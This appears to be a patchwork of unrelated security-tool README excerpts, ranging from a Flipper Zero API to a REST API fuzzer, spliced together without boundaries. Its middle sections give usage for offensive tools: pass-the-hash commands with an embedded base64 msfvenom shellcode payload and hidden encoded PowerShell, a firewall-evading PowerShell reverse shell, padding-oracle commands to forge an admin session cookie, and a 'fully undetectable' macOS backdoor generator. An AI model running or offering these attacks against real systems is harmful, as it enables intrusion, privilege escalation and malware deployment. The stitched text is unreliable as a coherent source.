flipper.gpio.read(pin_name=PIN_NAME)
#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)
#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"
#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)
#Stop loop
flipper.music_player.stop()
#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)
#Beep
flipper.music_player.beep()
#Beep for 5 seconds
flipper.music_player.beep(duration=5)
#Synchronous default timeout 5 seconds
#Detect NFC
nfc_detected = flipper.nfc.detect()
#Emulate NFC
flipper.nfc.emulate()
#Activate field
flipper.nfc.field()
#Synchronous default timeout 5 seconds
#Read RFID
rfid = flipper.rfid.read()
#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)
#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")
#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")
#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])
#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)
#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()
#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")
#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")
#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()
#Activate debug mode
flipper.debug.on()
#Deactivate debug mode
flipper.debug.off()
#Search
response = flipper.onewire.search()
#Get
response = flipper.i2c.get()
#Input dump
dump = flipper.input.dump()
#Send input
flipper.input.send("up", "press")
Feel free to contribute in any way
ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7
ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54
BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat
This project is a C# tool to use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation. You need a local administrator or SEImpersonate rights to use this. There is a blog post for explanation:
https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/
It is heavily based on the code from the project Sharp-SMBExec.
I faced certain Offensive Security project situations in the past, where I already had the NTLM-Hash of a low privileged
user account and needed a shell for that user on the current compromised system - but that was not possible with the current public tools. Imagine two more facts for a situation like that - the NTLM Hash could not be cracked and there is no process of the victim user to execute shellcode in it or to migrate into that process. This may sound like an absurd edge-case for some of you. I still experienced that multiple times. Not only in one engagement I spend a lot of time searching for the right tool/technique in that specific situation.
My personal goals for a tool/technique were:
low privileged
accounts - depending on engagement goals it might be needed to access a system with a specific user such as the CEO, HR-accounts, SAP-administrators or othersThe impersonated user unfortunately has no network authentication allowed, as the new process is using an Impersonation Token which is restricted. So you can only use this technique for local actions with another user.
There are two ways to use SharpNamedPipePTH. Either you can execute a binary (with or without arguments):
SharpNamedPipePTH.exe username:testing hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:C:\windows\system32\cmd.exe
SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"
Or you can execute shellcode as the other user:
SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=
Which is msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=threadmsfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0
.
I'm not happy with the shellcode execution yet, as it's currently spawning notepad as the impersonated user and injects shellcode into that new process via D/Invoke CreateRemoteThread Syscall. I'm still looking for possibility to spawn a process in the background or execute shellcode without having a process of the target user for memory allocation.
PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell.
Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing to bypass some firewalls and some countermeasures against this kind of remote connections.
Additionally, this tool features command history, screen wiping, file uploading and downloading, information splitting through chunks and reverse Base64 URL encoded traffic.
It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:
git clone https://github.com/JoelGMSec/PSAsyncShell
.\PSAsyncShell.ps1 -h
____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/
---------------------- by @JoelGMSec -----------------------
Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls
Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client
.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client to a PSAsyncShell server
Warning: All info betwen parts will be sent unencrypted
Download & Upload functions don't use MultiPart
https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
Exploit padding oracles for fun and profit!
Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:
This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.
As always, this tool should only be used on systems you own and/or have permission to probe!
Download from releases, or install with Go:
go get -u github.com/liamg/pax/cmd/pax
If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS
, you can use the following:
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"
This will hopefully give you some plaintext, perhaps something like:
{"user_id": 456, "is_admin": false}
It looks like you could elevate your privileges here!
You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'
This will spit out another base64 encoded set of encrypted data, perhaps something like:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
Now you can open your browser and set the value of the SESS
cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.
The following are great guides on how this attack works:
SCodeScanner stands for Source Code scanner where the user can scans the source code for finding the Critical Vulnerabilities. The main objective for this scanner is to find the vulnerabilities inside the source code before code gets published in Prod.
SCodeScanner received 5 CVEs for finding vulnerabilities in multiple CMS plugins.
pip3 install -r requirements.txt
python3 scscanner.py --help
I would love to hear your feedback on this tool. Open issues if you found any. And open PR request if you have something.
OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.
You can also PM me on discord for support or to ask for new features SubGlitch1#2983
Please check the wiki for information on how OSRipper functions (which changes extremely frequently)
https://github.com/SubGlitch1/OSRipper/wiki
Here are example backdoors which were generated with OSRipper
macOS .apps will look like this on vt
You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.
Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.
apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt
or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3
Only this
sudo python3 main.py
Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well
Coming soon
Just open a issue and ill make sure to get back to you
0.2.1
0.1.6
0.1.5
0.1.4
0.1.3
0.1.2
0.1.1
MIT
Inspiration, code snippets, etc.
I am very sorry to even write this here but my finances are not looking good right now. If you appreciate my work i would really be happy about any donation. You do NOT have to this is solely optional
BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T
I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.
Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.
The advantage of grabbing Syscalls dynamically is, that the signature of the Stubs is not included in the file and you don't have to worry about changing Windows versions.
To compile the shellcode execution template run the following:
nim c -d:release ShellcodeInject.nim
The result should look like this:
Kam1n0 v2.x is a scalable assembly management and analysis platform. It allows a user to first index a (large) collection of binaries into different repositories and provide different analytic services such as clone search and classification. It supports multi-tenancy access and management of assembly repositories by using the concept of Application. An application instance contains its own exclusive repository and provides a specialized analytic service. Considering the versatility of reverse engineering tasks, Kam1n0 v2.x server currently provides three different types of clone-search applications: Asm-Clone, Sym1n0, and Asm2Vec, and an executable classification based on Asm2Vec. New application type can be further added to the platform.
A user can create multiple application instances. An application instance can be shared among a specific group of users. The application repository read-write access and on-off status can be controlled by the application owner. Kam1n0 v2.x server can serve the applications concurrently using several shared resource pools.
Kam1n0 was developed by Steven H. H. Ding and Miles Q. Li under the supervision of Benjamin C. M. Fung of the Data Mining and Security Lab at McGill University in Canada. It won the second prize at the Hex-Rays Plug-In Contest 2015. If you find Kam1n0 useful, please cite our paper:
S. H. H. Ding, B. C. M. Fung, and P. Charland. Kam1n0: MapReduce-based Assembly Clone Search for Reverse Engineering. In Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (SIGKDD), pages 461-470, San Francisco, CA: ACM Press, August 2016.
S. H. H. Ding, B. C. M. Fung, and P. Charland. Asm2Vec: boosting static representation robustness for binary clone search against code obfuscation and compiler optimization. In Proceedings of the 40th IEEE Symposium on Security and Privacy (S&P), 18 pages, San Francisco, CA: IEEE Computer Society, May 2019.
Asm-Clone applications try to solve the efficient subgraph search problem (i.e. graph isomorphism problem) for assembly functions (<1.3s average query time and <30ms average index time with 2.3M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below).
Semantic clone search by differentiated fuzz testing and constraint solving. An efficient and scalable dynamic-static hybrid approach (<1s average query time and <100ms average index time with 1.5M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below). Support visualization of abstract syntax graph.
Asm2Vec leverages representation learning. It understands the lexical semantic relationship of assembly code. For example, xmm*
registers are semantically related to vector operations such as addps
. memcpy
is similar to strcpy
. The graph below shows different assembly functions compiled from the same source code of gmpz_tdiv_r_2exp
in libgmp. From left to right, the assembly functions are compiled with GCC O0 option, GCC O3 option, O-LLVM obfuscator Control Flow Graph, Flattening option, and LLVM obfuscator Bogus Control Flow Graph option. Asm2Vec can statically identify them as clones.
In this application, the user defines a set of software classes which are based on functional relatedness and provides binaries belong to each class. Then the system automatically groups functions into clusters in which functions are connected directly or indirectly by clone relation. The clusters that are discriminative for the classification are kept and serve as signatures of their classes. Given a target binary, the system shows the degree it belongs to each software class.
Use Asm2Vec as its function similarity computation model
The figure below shows the major UI components and functionalities of Kam1n0 v2.x. We adopt a material design. In general, each user has an application list, a running-job list, and a result file list.
The current release of Kam1n0 consists of two installers: the core server and IDA Pro plug-in.
Installer | Included components | Description |
---|---|---|
Kam1n0-Server.msi | Core engine | Main engine providing service for indexing and searching. |
Workbench | A user interface to manage the repositories and running service. | |
Web user interface | Web user interface for searching/indexing binary files and assembly functions. | |
Visual C++ redistributable for VS 15 | Dependecy for z3. | |
Kam1n0-IDA-Plugin.msi | Plug-in | Connectors and user interface. |
PyPI wheels for Cefpython | Rendering engine for the user interface. | |
PyPI and dependent wheels | Package management for Python. Included for IDA 6.8 &6.9. |
The Kam1n0 core engine is purely written in Java. You need the following dependencies:
Download the Kam1n0-Server.msi
file from our release page. Follow the instructions to install the server. You will be prompted to select an installation path. IDA Pro is optional if the server does not have to deal with any disassembling. In other words, the client side uses the Kam1n0 plugin for IDA Pro. It is strongly suggested to have the IDA Pro installed with the Kam1n0 server. Kam1n0 server will automatically detect your IDA Pro by looking for the default application that you used to open .i64
file.
The Kam1n0 IDA Pro plug-in is written in Python for the logic and in HTML/JavaScript for the rendering. The following dependencies are required for its installation:
Next, download the Kam1n0-IDA-Plugin.msi
installer from our release page. Follow the instructions to install the plug-in and runtime. Please note that the plug-in has to be installed in the IDA Pro plugins folder which is located at $IDA_PRO_PATH$/plugins
. For example, on Windows, the path could be C:/Program Files (x86)/IDA 6.95/plugins
. The installer will detect and validate the path.
Ensure you have the Oracle version of Java 11. (Not default-jdk in apt.)
sudo add-apt-repository ppa:webupd8team/java
~webupd8team not found
), if you are on a proxy, make sure you set and export your http_proxy
and https_proxy
environment variables, and then try again with the -E
option on sudo. Additionally, if you are getting a 'add-apt repository command not found error, try: sudo apt install -y software-properties-common
.sudo apt-get update
, and sudo apt-get install oracle-java8-installer
java -version
; you may need to manually set the JAVA_HOME environment variable (in /etc/environment
), JAVA_HOME=/usr/lib/jvm/java-11-oracle
Download the latest release for Linux (Kam1n0-IDA-Plugin.tar.gz and Kam1n0-Server.tar.gz) from Kam1n0-Community.
Extract the two tarballs (i.e. tar –xvzf Kam1n0-IDA-Plugin.tar.gz and tar –xvzf Kam1n0-Server.tar.gz)
The Kam1n0-Server.tar.gz file will create the server directory.
Inside the server
directory, you should see a file called kam1n0.properties
, which is where you will set various configurations for kam1n0; this is very important.
Set kam1n0.data.path
to where you would like your kam1n0-related data to be written to. We choose to put it in the same place that we keep our server
. kam1n0.ida.home
refers to where your IDA installation is located. Comment this line (and kam1n0.ida.batch
, the line following) if you do not have IDA and don't plan to use kam1n0 for disassembly. For more (accurate) information about the kam1n0.properties
file, see the kam1n0.properties.explained
file.
Run kam1n0-server-workbench: java -jar kam1n0-server-workbench.jar
. This should cause a window to pop up, which prompts you to actually start kam1n0. Alternatively, run kam1n0-server: java -jar kam1n0-server.jar --start
. This starts the server from the console without a window.
To connect and use it, go to 127.0.0.1:8571
(the default port kam1n0 listens on should be 8571, but can be changed in kam1n0.properties) in your browser. You should see the pretty kam1n0 web UI. From there, follow the tutorial on the Kam1n0-Community repo if you do not know how to use kam1n0.
The assembly code repositories and configuration files used in previous versions (<2.0.0) are no longer supported by the latest version. Please contact us if you need to migrate your old repositories.
Clone the latest stable branch (don't forget --recursive
!):
git clone --recursive -b master2.x --single-branch https://github.com/McGill-DMaS/Kam1n0-Community
IntelliJ: Import the root /kam1n0/kam1n0/ as a maven project. All the submodules will be loaded accordingly. EclipseEE: Add the cloned git repository to the git view. Import all maven projects from the git repository. You may need to modify the classpath to address any error. All the resources path are dynamically modified when running inside an IDE (through the kam1n0-resources submodule).
To build the project:
cd /kam1n0/kam1n0
mvn -DskipTests clean package
mvn -DskipTests package
The resulting binaries can be found in /kam1n0/build-bins/
To run the test code, you will need to first download chromedriver.exe
from http://chromedriver.chromium.org/ and add its absolute path into an environment variable named webdriver.chrome.driver
. It is also required that there is a chrome browser installed in the system. The test code will launch a browser instance to test the UI interfaces. The complete testing procedure will take approximately 3 hours.
cd /kam1n0/kam1n0
mvn -DskipTests clean package # you can skip this one if you already built the package
mvn -DskipTests package # you can skip this one if you already built the package
mvn -DforkMode=never test
These commands only compiles java with pre-compiled wheels of libvex and z3. It works out-of-the-box. The build of libvex and z3 is platform-dependent. We use a fork of libvex from Angr. More serious build scripts as well as installers for windows/linux can be found under /kam1n0-builds/
We have a Jenkin server for contineous development and delivery. Latest stable release will be posted here. Periodically we will synchronize our internal experimental branch with this repository.
The software was developed by Steven H. H. Ding, Miles Q. Li, and Benjamin C. M. Fung in the McGill Data Mining and Security Lab and Queen's L1NNA Research Laboratory in Canada. It is distributed under the Apache License Version 2.0. Please refer to LICENSE.txt for details.
Copyright 2014-2021 McGill University and the Researchers. All rights reserved.
REST API fuzzer and negative testing tool. Run thousands of self-healing API tests within minutes with no coding effort!
By using a simple and minimal syntax, with a flat learning curve, CATS (Contract Auto-generated Tests for Swagger) enables you to generate thousands of API tests within minutes with no coding effort. All tests are generated, run and reported automatically based on a pre-defined set of 89 Fuzzers. The Fuzzers cover a wide range of input data from fully random large Unicode values to well crafted, context dependant values based on the request data types and constraints. Even more, you can leverage the fact that CATS generates request payloads dynamically and write simple end-to-end functional tests.
This is a list of articles with step-by-step guides on how to use CATS:
> brew tap endava/tap
> brew install cats
CATS is bundled both as an executable JAR or a native binary. The native binaries do not need Java installed.
After downloading your OS native binary, you can add it in classpath so that you can execute it as any other command line tool:
sudo cp cats /usr/local/bin/cats
You can also get autocomplete by downloading the cats_autocomplete script and do:
source cats_autocomplete
To get persistent autocomplete, add the above line in ~/.zshrc
or ./bashrc
, but make sure you put the fully qualified path for the cats_autocomplete
script.
You can also check the cats_autocomplete
source for alternative setup.
There is no native binary for Windows, but you can use the uberjar version. This requires Java 11+ to be installed.
You can run it as java -jar cats.jar
.
Head to the releases page to download the latest versions: https://github.com/Endava/cats/releases.
You can build CATS from sources on you local box. You need Java 11+. Maven is already bundled.
Before running the first build, please make sure you do a ./mvnw clean
. CATS uses a fork ok OKHttpClient
which will install locally under the 4.9.1-CATS
version, so don't worry about overriding the official versions.
You can use the following Maven command to build the project:
./mvnw package -Dquarkus.package.type=uber-jar
cp target/
You will end up with a cats.jar
in the target
folder. You can run it wih java -jar cats.jar ...
.
You can also build native images using a GraalVM Java version.
./mvnw package -Pnative
Note: You will need to configure Maven with a Github PAT with read-packages
scope to get some dependencies for the build.
You may see some ERROR
log messages while running the Unit Tests. Those are expected behaviour for testing the negative scenarios of the Fuzzers
.
Blackbox mode means that CATS doesn't need any specific context. You just need to provide the service URL, the OpenAPI spec and most probably authentication headers.
> cats --contract=openapy.yaml --server=http://localhost:8080 --headers=headers.yml --blackbox
In blackbox mode CATS will only report ERRORs
if the received HTTP response code is a 5XX
. Any other mismatch between what the Fuzzer expects vs what the service returns (for example service returns 400
and service returns 200
) will be ignored.
The blackbox mode is similar to a smoke test. It will quickly tell you if the application has major bugs that must be addressed immediately.
The real power of CATS relies on running it in a non-blackbox mode also called context mode. Each Fuzzer has an expected HTTP response code based on the scenario under test and will also check if the response is matching the schema defined in the OpenAPI spec specific to that response code. This will allow you to tweak either your OpenAPI spec or service behaviour in order to create good quality APIs and documentation and also to avoid possible serious bugs.
Running CATS in context mode usually implies providing it a --refData file with resource identifiers specific to the business logic. CATS cannot create data on its own (yet), so it's important that any request field or query param that requires pre-existence of those entities/resources to be created in advance and added to the reference data file.
> cats --contract=openapy.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml
You may notice a significant number of tests marked as skipped
. CATS will try to apply all Fuzzers
to all fields, but this is not always possible. For example the BooleanFieldsFuzzer
cannot be applied to String
fields. This is why that test attempt will be marked as skipped. It was an intentional decision to also report the skipped
tests in order to show that CATS actually tries all the Fuzzers
on all the fields/paths/endpoints.
Additionally, CATS support a lot more arguments that allows you to restrict the number of fuzzers, provide timeouts, limit the number of requests per minute and so on.
CATS generates tests based on configured Fuzzer
s. Each Fuzzer
has a specific scenario and a specific expected result. The CATS engine will run the scenario, get the result from the service and match it with the Fuzzer
expected result. Depending on the matching outcome, CATS will report as follows:
INFO
/SUCCESS
is expected and documented behaviour. No need for action.WARN
is expected but undocumented behaviour or some misalignment between the contract and the service. This will ideally be actioned.ERROR
is abnormal/unexpected behaviour. This must be actioned.CATS will iterate through all endpoints, all HTTP methods and all the associated requests bodies and parameters (including multiple combinations when dealing with oneOf
/anyOf
elements) and fuzz their values considering their defined data type and constraints. The actual fuzzing depends on the specific Fuzzer
executed. Please see the list of fuzzers and their behaviour. There are also differences on how the fuzzing works depending on the HTTP method:
This means that for methods with request bodies (POST,PUT
) that have also URL/path parameters, you need to supply the path
parameters via urlParams
or the referenceData
file as failure to do so will result in Illegal character in path at index ...
errors.
HTML_JS
is the default report produced by CATS. The execution report in placed a folder called cats-report/TIMESTAMP
or cats-report
depending on the --timestampReports
argument. The folder will be created inside the current folder (if it doesn't exist) and for each run a new subfolder will be created with the TIMESTAMP
value when the run started. This allows you to have a history of the runs. The report itself is in the index.html
file, where you can:
All
, Success
, Warn
and Error
Fuzzer
so that you can only see the runs for that specific Fuzzer
Along with the summary from index.html
each individual test will have a specific TestXXX.html
page with more details, as well as a json version of the test which can be latter replayed using > cats replay TestXXX.json
.
Understanding the Result Reason
values:
Unexpected Exception
- reported as error
; this might indicate a possible bug in the service or a corner case that is not handled correctly by CATSNot Matching Response Schema
- reported as a warn
; this indicates that the service returns an expected response code and a response body, but the response body does not match the schema defined in the contractUndocumented Response Code
- reported as a warn
; this indicates that the service returns an expected response code, but the response code is not documented in the contractUnexpected Response Code
- reported as an error
; this indicates a possible bug in the service - the response code is documented, but is not expected for this scenarioUnexpected Behaviour
- reported as an error
; this indicates a possible bug in the service - the response code is neither documented nor expected for this scenarioNot Found
- reported as an error
in order to force providing more context; this indicates that CATS needs additional business context in order to run successfully - you can do this using the --refData
and/or --urlParams
argumentsAnd this is what you get when you click on a specific test:
This format is similar with HTML_JS
, but you cannot do any filtering or sorting.
CATS also supports JUNIT output. The output will be a single testsuite
that will incorporate all tests grouped by Fuzzer
name. As the JUNIT format does not have the concept of warning
the following mapping is used:
error
is reported as JUNIT error
failure
is not used at allwarn
is reported as JUNIT skipped
skipped
is reported as JUNIT disabled
The JUNIT report is written as junit.xml
in the cats-report
folder. Individual tests, both as .html
and .json
will also be created.
CATS has a significant number of Fuzzers
. Currently, 89 and growing. Some of the Fuzzers
are executing multiple tests for every given field within the request. For example the ControlCharsOnlyInFieldsFuzzer
has 63 control chars values that will be tried for each request field. If a request has 15 fields for example, this will result in 1020 tests. Considering that there are additional Fuzzers
with the same magnitude of tests being generated, you can easily get to 20k tests being executed on a typical run. This will result in huge reports and long run times (i.e. minutes, rather than seconds).
Below are some recommended strategies on how you can separate the tests in chunks which can be executed as stages in a deployment pipeline, one after the other.
You can use the --paths=PATH
argument to run CATS sequentially for each path.
You can use the --checkXXX
arguments to run CATS only with specific Fuzzers
like: --checkHttp
, -checkFields
, etc.
You can use various arguments like --fuzzers=Fuzzer1,Fuzzer2
or -skipFuzzers=Fuzzer1,Fuzzer2
to either include or exclude specific Fuzzers
. For example, you can run all Fuzzers
except for the ControlChars
and Whitespaces
ones like this: --skipFuzzers=ControlChars,Whitesspaces
. This will skip all Fuzzers containing these strings in their name. After, you can create an additional run only with these Fuzzers
: --fuzzers=ControlChars,Whitespaces
.
These are just some recommendations on how you can split the types of tests cases. Depending on how complex your API is, you might go with a combination of the above or with even more granular splits.
Please note that due to the fact that ControlChars, Emojis and Whitespaces
generate huge number of tests even for small OpenAPI contracts, they are disabled by default. You can enable them using the --includeControlChars
, --includeWhitespaces
and/or --includeEmojis
arguments. The recommendation is to run them in separate runs so that you get manageable reports and optimal running times.
By default, CATS will report WARNs
and ERRORs
according to the specific behaviour of each Fuzzer. There are cases though when you might want to focus only on critical bugs. You can use the --ignoreResponseXXX
arguments to supply a list of response codes, response sizes, word counts, line counts or response body regexes that should be ignored as issues (overriding the Fuzzer behaviour) and report those cases as success instead or WARN
or ERROR
. For example, if you want CATS to report ERRORs
only when there is an Exception or the service returns a 500
, you can use this: --ignoreResultCodes="2xx,4xx"
.
You can also choose to ignore checks done by the Fuzzers. By default, each Fuzzer has an expected response code, based on the scenario under test and will report and WARN
the service returns the expected response code, but the response code is not documented inside the contract. You can make CATS ignore the undocumented response code checks (i.e. checking expected response code inside the contract) using the --ignoreResponseCodeUndocumentedCheck
argument. CATS with now report these cases as SUCCESS
instead of WARN
.
Additionally, you can also choose to ignore the response body checks. By default, on top of checking the expected response code, each Fuzzer will check if the response body matches what is defined in the contract and will report an WARN
if not matching. You can make CATS ignore the response body checks using the --ingoreResponseBodyCheck
argument. CATS with now report these cases as SUCCESS
instead of WARN
.
When CATS runs, for each test, it will export both an HTML file that will be linked in the final report and individual JSON files. The JSON files can be used to replay that test. When replaying a test (or a list of tests), CATS won't produce any report. The output will be solely available in the console. This is useful when you want to see the exact behaviour of the specific test or attach it in a bug report for example.
The syntax for replaying tests is the following:
> cats replay "Test1,Test233,Test15.json,dir/Test19.json"
Some notes on the above example:
,
Test15.json
in the current folder and Test19.json
in the dir
foldercats-report
folder i.e. cats-report/Test1.json
and cats-report/Test233.json
To list all available commands, run:
> cats -h
All available subcommands are listed below:
> cats help
or cats -h
will list all available options
> cats list --fuzzers
will list all the existing fuzzers, grouped on categories
> cats list --fieldsFuzzingStrategy
will list all the available fields fuzzing strategies
> cats list --paths --contract=CONTRACT
will list all the paths available within the contract
> cats replay "test1,test2"
will replay the given tests test1
and test2
> cats fuzz
will fuzz based on a given request template, rather than an OpenAPI contract
> cats run
will run functional and targeted security tests written in the CATS YAML format
> cats lint
will run OpenAPI contract linters, also called ContractInfoFuzzers
--contract=LOCATION_OF_THE_CONTRACT
supplies the location of the OpenApi or Swagger contract.--server=URL
supplies the URL of the service implementing the contract.--basicauth=USR:PWD
supplies a username:password
pair, in case the service uses basic auth.--fuzzers=LIST_OF_FUZZERS
supplies a comma separated list of fuzzers. The supplied list of Fuzzers can be partial names, not full Fuzzer names. CATS which check for all Fuzzers containing the supplied strings. If the argument is not supplied, all fuzzers will be run.--log=PACKAGE:LEVEL
can configure custom log level for a given package. You can provide a comma separated list of packages and levels. This is helpful when you want to see full HTTP traffic: --log=org.apache.http.wire:debug
or suppress CATS logging: --log=com.endava.cats:warn
--paths=PATH_LIST
supplies a comma separated list of OpenApi paths to be tested. If no path is supplied, all paths will be considered.--skipPaths=PATH_LIST
a comma separated list of paths to ignore. If no path is supplied, no path will be ignored--fieldsFuzzingStrategy=STRATEGY
specifies which strategy will be used for field fuzzing. Available strategies are ONEBYONE
, SIZE
and POWERSET
. More information on field fuzzing can be found in the sections below.--maxFieldsToRemove=NUMBER
specifies the maximum number of fields to be removed when using the SIZE
fields fuzzing strategy.--refData=FILE
specifies the file containing static reference data which must be fixed in order to have valid business requests. This is a YAML file. It is explained further in the sections below.--headers=FILE
specifies a file containing headers that will be added when sending payloads to the endpoints. You can use this option to add oauth/JWT tokens for example.--edgeSpacesStrategy=STRATEGY
specifies how to expect the server to behave when sending trailing and prefix spaces within fields. Possible values are trimAndValidate
and validateAndTrim
.--sanitizationStrategy=STRATEGY
specifies how to expect the server to behave when sending Unicode Control Chars and Unicode Other Symbols within the fields. Possible values are sanitizeAndValidate
and validateAndSanitize
--urlParams
A comma separated list of 'name:value' pairs of parameters to be replaced inside the URLs. This is useful when you have static parameters in URLs (like 'version' for example).--functionalFuzzerFile
a file used by the FunctionalFuzzer
that will be used to create user-supplied payloads.--skipFuzzers=LIST_OF_FIZZERs
a comma separated list of fuzzers that will be skipped for all paths. You can either provide full Fuzzer
names (for example: --skippedFuzzers=VeryLargeStringsFuzzer
) or partial Fuzzer
names (for example: --skipFuzzers=VeryLarge
). CATS
will check if the Fuzzer
names contains the string you provide in the arguments value.--skipFields=field1,field2#subField1
a comma separated list of fields that will be skipped by replacement Fuzzers like EmptyStringsInFields, NullValuesInFields, etc.--httpMethods=PUT,POST,etc
a comma separated list of HTTP methods that will be used to filter which http methods will be executed for each path within the contract--securityFuzzerFile
A file used by the SecurityFuzzer
that will be used to inject special strings in order to exploit possible vulnerabilities--printExecutionStatistics
If supplied (no value needed), prints a summary of execution times for each endpoint and HTTP method. By default this will print a summary for each endpoint: max, min and average. If you want detailed reports you must supply --printExecutionStatistics=detailed
--timestampReports
If supplied (no value needed), it will output the report still inside the cats-report
folder, but in a sub-folder with the current timestamp--reportFormat=FORMAT
Specifies the format of the CATS report. Supported formats: HTML_ONLY
, HTML_JS
or JUNIT
. You can use HTML_ONLY
if you want the report to not contain any Javascript. This is useful in CI environments due to Javascript content security policies. Default is HTML_JS
which includes some sorting and filtering capabilities.--useExamples
